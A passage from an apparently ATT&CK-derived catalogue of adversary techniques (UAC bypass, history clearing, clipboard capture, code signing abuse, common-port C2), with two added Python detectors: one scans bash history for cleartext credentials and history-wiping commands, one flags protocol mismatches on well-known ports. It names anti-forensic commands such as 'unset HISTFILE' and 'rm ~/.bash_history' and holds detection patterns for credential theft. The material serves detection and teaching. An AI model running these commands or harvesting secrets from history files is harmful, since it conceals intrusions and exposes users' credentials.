* <code>eventvwr.exe</code> can auto-elevate and execute a specified binary or script. [[CiteRef::enigma0x3 Fileless UAC Bypass]][[CiteRef::Fortinet Fareit]]
Another bypass is possible through some [[Lateral Movement]] techniques if credentials for an account with administrator privileges are known: since UAC is a single-system security mechanism, the privilege or integrity of a process running on one system is unknown on lateral systems and defaults to high integrity. [[CiteRef::SANS UAC Bypass]]
C
Change Default File Association: When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access. [[CiteRef::Microsoft Change Default Programs]][[CiteRef::Microsoft File Handlers]] Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
Clear Command History: macOS and Linux both keep track of the commands users type in their terminal so that users can easily remember what they've done. These logs can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable <code>HISTFILE</code>. When a user logs off a system, this information is flushed to a file in the user's home directory called <code>~/.bash_history</code>. The benefit of this is that it allows users to go back to commands they've used before in different sessions. Since everything typed on the command line is saved, passwords passed in on the command line are also saved. Adversaries can abuse this by searching these files for cleartext passwords. Additionally, adversaries can use a variety of methods to prevent their own commands from appearing in these logs, such as <code>unset HISTFILE</code>, <code>export HISTFILESIZE=0</code>, <code>history -c</code>, and <code>rm ~/.bash_history</code>.
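Both sides of the two history entries above (Bash History and Clear Command History) come down to reading the same file: an adversary greps it for secrets, and an analyst greps it for the commands that suppress or wipe it. The following is an added example, not code from the ATT&CK page, that does both over a constructed <code>~/.bash_history</code>. The credential patterns are heuristics for common tools (assumptions for this example), and the anti-forensics list covers the four commands the page names plus <code>HISTFILE=/dev/null</code> and <code>set +o history</code>, which have the same effect.

```python
import re
from typing import Dict, List, Tuple

# Constructed ~/.bash_history content; credentials, hosts and keys are made up.
SAMPLE_HISTORY = """\
ls -la
mysql -u app -pS3cretPass! -h db.internal
sshpass -p 'Winter2024!' ssh ops@10.0.0.5
curl -u deploy:hunter2 https://repo.internal/artifact.tgz
export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
git log --oneline
unset HISTFILE
history -c
"""

# Command-line shapes that commonly carry a secret (heuristics, not exhaustive).
CREDENTIAL_PATTERNS: List[Tuple[str, re.Pattern]] = [
    ("mysql_password_flag", re.compile(r"\bmysql\b.*\s-p(\S+)")),
    ("sshpass", re.compile(r"\bsshpass\b.*\s-p\s+[\'\"]?([^\s\'\"]+)")),
    ("curl_basic_auth", re.compile(r"\bcurl\b.*\s(?:-u|--user)\s+(\S+)")),
    ("secret_env_export",
     re.compile(r"\bexport\s+\w*(?:SECRET|PASSWORD|TOKEN|KEY)\w*=(\S+)", re.I)),
    ("password_option", re.compile(r"--password[=\s](\S+)")),
]

# Commands that stop history being written, or remove what was written.
ANTI_FORENSICS = [
    re.compile(r"^\s*unset\s+HISTFILE\b"),
    re.compile(r"\bHISTFILE=/dev/null\b"),
    re.compile(r"\bHIST(FILE)?SIZE=0\b"),
    re.compile(r"^\s*history\s+-c\b"),
    re.compile(r"^\s*set\s+\+o\s+history\b"),
    re.compile(r"^\s*rm\s+.*\.bash_history\b"),
]


def find_credentials(history: str) -> List[Dict[str, object]]:
    """Lines that appear to contain a secret, with the captured value."""
    hits = []
    for n, line in enumerate(history.splitlines(), 1):
        for kind, rx in CREDENTIAL_PATTERNS:
            m = rx.search(line)
            if m:
                hits.append({"line": n, "kind": kind, "secret": m.group(1)})
    return hits


def find_history_tampering(history: str) -> List[int]:
    """Line numbers of commands that disable or clear the history itself.
    Seeing these at the end of a file is itself a signal: whatever ran after
    them is missing."""
    return [n for n, line in enumerate(history.splitlines(), 1)
            if any(rx.search(line) for rx in ANTI_FORENSICS)]


if __name__ == "__main__":
    for hit in find_credentials(SAMPLE_HISTORY):
        print(f"line {hit['line']}: {hit['kind']} -> {hit['secret']}")
    print("tampering on lines:", find_history_tampering(SAMPLE_HISTORY))
```

Because the file is only flushed at logout, a live investigation should also collect the running shell's in-memory history (for example with <code>history</code> in that session, or from <code>/proc/&lt;pid&gt;/fd</code> if the file was unlinked while still open), and a shell started with <code>HISTFILE</code> unset leaves nothing to read at all.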
Clipboard Data: Adversaries may collect data stored in the clipboard from users copying information within or between applications.
===Windows===
Applications can access clipboard data by using the Windows API. [[CiteRef::MSDN Clipboard]]
===Mac===
macOS provides a native command, <code>pbpaste</code>, to grab clipboard contents. [[CiteRef::Operating with EmPyre]]
Code Signing: Code signing provides a level of authenticity for a binary from the developer and a guarantee that the binary has not been tampered with. [[CiteRef::Wikipedia Code Signing]] However, adversaries are known to use code signing certificates to make malware and tools look like legitimate binaries. [[CiteRef::Janicab]] The certificates used during an operation may be created, forged, or stolen by the adversary. [[CiteRef::Securelist Digital Certificates]][[CiteRef::Symantec Digital Certificates]] Code signing to verify software on first run can be used on modern Windows and macOS/OS X systems. It is not used on Linux due to the decentralized nature of the platform. [[CiteRef::Wikipedia Code Signing]] Code signing certificates may be used to bypass security policies that require signed code to execute on a system.
Command-Line Interface: Command-line interfaces provide a way of interacting with computer systems and are a common feature across many types of operating system platforms. [[CiteRef::Wikipedia Command-Line Interface]] One example command-line interface on Windows systems is [[Software/S0106|cmd]], which can be used to perform a number of tasks including execution of other software. Command-line interfaces can be interacted with locally or remotely via a remote desktop application, reverse shell session, etc. Commands that are executed run with the current permission level of the command-line interface process unless the command includes process invocation that changes the permissions context for that execution (e.g., [[Technique/T1053|Scheduled Task]]). Adversaries may use command-line interfaces to interact with systems and execute other software during the course of an operation.
Commonly Used Port: Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend with normal network activity to avoid more detailed inspection. They may use commonly open ports such as:
* TCP:80 (HTTP)
* TCP:443 (HTTPS)
* TCP:25 (SMTP)
* TCP/UDP:53 (DNS)
They may use the protocol associated with the port or a completely different protocol. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), examples of common ports are:
* TCP/UDP:135 (RPC)
* TCP:22 (SSH)
* TCP/UDP:3389 (RDP)
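The practical detection for "a completely different protocol" on a well-known port is to fingerprint the first client bytes of each flow and compare them with what the port number promises. The following added example (not from the ATT&CK page) does that for the ports listed above over constructed flow records; the fingerprints are minimal header checks chosen for the example, and a real sensor would use a full protocol analyzer.

```python
import re
from typing import Dict, List, Optional, Tuple

# Application protocol expected on each (transport, port) from the lists above.
EXPECTED: Dict[Tuple[str, int], str] = {
    ("tcp", 80): "http", ("tcp", 443): "tls", ("tcp", 25): "smtp",
    ("tcp", 53): "dns", ("udp", 53): "dns", ("tcp", 22): "ssh",
    ("tcp", 135): "rpc", ("tcp", 3389): "rdp",
}
HTTP_REQUEST = re.compile(rb"^(GET|POST|HEAD|PUT|DELETE|OPTIONS|PATCH|CONNECT) \S+ HTTP/1\.[01]\r\n")


def identify(proto: str, payload: bytes) -> Optional[str]:
    """Guess the application protocol from the first client bytes (heuristics)."""
    if len(payload) >= 3 and payload[0] == 0x16 and payload[1] == 0x03 and payload[2] <= 0x04:
        return "tls"        # TLS record layer: handshake (0x16), version 3.x
    if HTTP_REQUEST.match(payload):
        return "http"
    if payload.startswith(b"SSH-"):
        return "ssh"        # SSH identification string
    if payload[:4].upper() in (b"EHLO", b"HELO"):
        return "smtp"
    if payload[:3] == b"\x03\x00\x00":
        return "rdp"        # TPKT header that begins the X.224 connection request
    if proto == "tcp" and len(payload) > 2 and payload[:2] == b"\x05\x00" and payload[2] == 0x0B:
        return "rpc"        # DCE/RPC version 5, bind PDU
    if (proto == "udp" and len(payload) >= 12 and not payload[2] & 0x80
            and int.from_bytes(payload[4:6], "big") == 1):
        return "dns"        # QR=0 query with exactly one question
    return None


def find_port_protocol_mismatches(flows: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Flows on a listed port whose payload is not the protocol that port implies."""
    findings = []
    for i, f in enumerate(flows):
        expected = EXPECTED.get((f["proto"], f["dport"]))
        if expected is None:
            continue    # not one of the ports under discussion
        observed = identify(f["proto"], f["payload"])
        if observed != expected:
            findings.append({"flow": i, "src": f["src"], "dport": f["dport"],
                             "expected": expected, "observed": observed or "unrecognized"})
    return findings


# Constructed flow records: first client bytes only; hosts are private ranges.
SAMPLE_FLOWS = [
    {"src": "10.0.0.5", "proto": "tcp", "dport": 443,
     "payload": b"\x16\x03\x01\x00\xc8\x01\x00\x00\xc4\x03\x03"},
    {"src": "10.0.0.5", "proto": "tcp", "dport": 80,
     "payload": b"GET / HTTP/1.1\r\nHost: intranet\r\n\r\n"},
    {"src": "10.0.0.8", "proto": "tcp", "dport": 443,
     "payload": b"SSH-2.0-OpenSSH_9.6\r\n"},                   # SSH tunnel hiding on 443
    {"src": "10.0.0.8", "proto": "tcp", "dport": 80,
     "payload": b"\xde\xad\x00\x10\x7f\x01\x02\x03"},          # custom C2 framing on 80
    {"src": "10.0.0.9", "proto": "udp", "dport": 53,
     "payload": b"\x12\x34\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00"
                b"\x07example\x03com\x00\x00\x01\x00\x01"},
    {"src": "10.0.0.9", "proto": "tcp", "dport": 53,
     "payload": b"GET /beacon HTTP/1.1\r\nHost: c2\r\n\r\n"},   # HTTP where DNS is expected
    {"src": "10.0.0.11", "proto": "tcp", "dport": 22,
     "payload": b"SSH-2.0-OpenSSH_9.6\r\n"},
]


if __name__ == "__main__":
    for f in find_port_protocol_mismatches(SAMPLE_FLOWS):
        print(f)
```

The three flagged flows are the ones the passage warns about: SSH on 443, an unrecognized binary protocol on 80, and HTTP on 53. A flow that really is TLS on 443 is not flagged here even if it is C2, which is why this check complements rather than replaces TLS fingerprinting and destination reputation.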